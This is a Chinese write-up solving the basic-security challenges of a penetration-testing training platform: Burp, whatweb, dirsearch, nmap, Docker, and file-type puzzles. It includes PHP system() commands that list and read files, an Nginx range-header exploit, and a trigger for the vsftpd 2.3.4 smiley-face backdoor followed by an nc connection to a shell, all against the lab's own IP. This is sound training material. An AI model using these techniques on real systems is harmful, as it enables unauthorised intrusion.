0


【安鸾渗透实战平台】安全基础/( 全 | 通关 )

文章目录

BurpSuite抓包


1. 浏览器访问,burp抓包,得到flag文件
在这里插入图片描述
2. 访问flag文件,拿到flag在这里插入图片描述
在这里插入图片描述

指纹识别


1. 下载whatweb

# 更新软件包apt-get update
# 下载whatwebapt-getinstall whatweb

2. 使用whatweb进行指纹识别, 拿到flag

whatweb http://47.100.220.113:8009/

在这里插入图片描述
在这里插入图片描述

Nginx整数溢出漏洞


1. 访问/proxy/demo.png
在这里插入图片描述

在这里插入图片描述
2. burp抓包,构造一个range头,在返回包中可看到flag
在这里插入图片描述
在这里插入图片描述

PHP代码基础


1. 查看根目录, 发现flag文件 || 点击左上角保存键运行代码

<?phpsystem("ls /");

在这里插入图片描述
2. 查看文件内容, 拿到flag

# * 为通配符, 匹配任意内容<?php
system("cat /this_is_flag*.txt");

在这里插入图片描述

在这里插入图片描述

Linux基础命令


1. finalshell 连接主机
在这里插入图片描述
2. 查找所有文件名中含有flag的文件

find / -name"*flag*"

在这里插入图片描述
3. 查看文件内容, 拿到一半flag

cat /home/test/.this_is_flag

在这里插入图片描述
4. 根据提示, 查找文件

find / -name"*Jiuyin-Sutra-Volume-2*"

在这里插入图片描述
5. 查看文件内容,拿到另一半flag

cat /usr/games/.Jiuyin-Sutra-Volume-2

在这里插入图片描述

在这里插入图片描述

Mysql数据库基础


1. 使用Navicat连接数据库, 使用SSH隧道
在这里插入图片描述
在这里插入图片描述
2. 查看whalwl库、flag表的flag字段, 拿到flag
在这里插入图片描述

在这里插入图片描述

目录扫描


1. 使用目录扫描工具爆破目录,使用提供的字典 | 请求方式设置为HEAD | 我使用的是dirsearch

dirsearch -u http://47.100.220.113:8008/ -w d:\dicc.txt -e php -t 1 -m head

在这里插入图片描述
2. 扫描的源码,访问下载解压, 发现flag文件
在这里插入图片描述
3. 查看文件内容,拿到flag
在这里插入图片描述

在这里插入图片描述

端口扫描


1. 经典的笑脸后门 | 根据提示扫描端口,扫描到vsftpd2.3.4(笑脸后门特征)

nmap -Pn -p 10021 -sV 47.100.220.113

在这里插入图片描述
在这里插入图片描述
2. ftp连接,用户名带有:) ,密码任意 | [使用第二组,第一组无法复现]

# 按以下顺序输入
ftp
open 47.100.220.113 20021
aaa:)
aaa

在这里插入图片描述

3. nc连接所给的后门端口 | whoami测试是否拿到shell

nc47.100.220.113 26200whoami

在这里插入图片描述
在这里插入图片描述

4. 查看当前目录, 发现flag文件

ls

在这里插入图片描述
5. 查看文件内容,得到flag

cat this_is_flag

在这里插入图片描述

在这里插入图片描述

Docker容器基础


1. docker拉取镜像

sudodocker pull registry.cn-shanghai.aliyuncs.com/whalwl/docker_test

在这里插入图片描述

2. 查看镜像

sudodocker images

在这里插入图片描述
3. 启动镜像并查看

sudodocker run -it-d fbe61513a072
sudodockerps

在这里插入图片描述
4. 命令行方式进入镜像

sudodockerexec-it 0d31b81c8e65 /bin/bash

在这里插入图片描述
5. 查找flag文件

find / -name"*flag*"

在这里插入图片描述
6. 查看文件内容, 拿到flag

cat /root/this_is_flag

在这里插入图片描述

在这里插入图片描述

文件类型


1. 下载文件,解压三次
在这里插入图片描述
在这里插入图片描述

2. 找一个在线识别文件格式的网站,识别第一个
在这里插入图片描述
3. 图片,修改后缀为.jpg,拿到flag-1
在这里插入图片描述
4. 识别第二个文件
在这里插入图片描述
5. 注意到一个exe,后缀改成exe,命令行运行,拿到flag-2

.\flag-2.exe

在这里插入图片描述
6. 识别flag-3 ,未知
在这里插入图片描述
7. 用记事本打开看一下内容,以ELF开头,应该时ELF文件(Linux可执行文件)
在这里插入图片描述
8. 拖到linux上运行,拿到flag-3

# 加可执行权限chmod +x flag-3
# 执行
./flag-3 

在这里插入图片描述
9. 识别flag-4
在这里插入图片描述
10. 还是.exe,运行一下,出现报错
在这里插入图片描述

11. 根据报错可判断出使用python访问本机的8888端口,用nc监听下8888端口,再启动exe

# 终端1
nc -lvnp 8888

在这里插入图片描述

# 终端2.\flag-4.exe

在这里插入图片描述
12. 终端1收到http报文
在这里插入图片描述
13. 随意输入内容回车,报错
在这里插入图片描述
14. 根据报错推测要构造一个状态码为200的返回包, 拿到flag-4

HTTP/1.1 200 OK
Server: nginx
Content-Length: 8
Via: 1.1 google
Date: Mon, 21 Nov 2022 08:39:06 GMT
Age: 14252
Content-Type: text/plain
Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
Connection: close

success

在这里插入图片描述
在这里插入图片描述
15. 识别flag-5,zip文件,解压出来
在这里插入图片描述
在这里插入图片描述
16. .class文件,丢进jd反编译下,拿到flag-5
在这里插入图片描述
17. 将flag-1 ~ flag-5 拼接得到最终flag
在这里插入图片描述

标签: 安全 linux web安全

本文转载自: https://blog.csdn.net/qq_34485854/article/details/127960744
版权归原作者 半程客梦i 所有, 如有侵权,请联系我们删除。

“【安鸾渗透实战平台】安全基础/( 全 | 通关 )”的评论:

还没有评论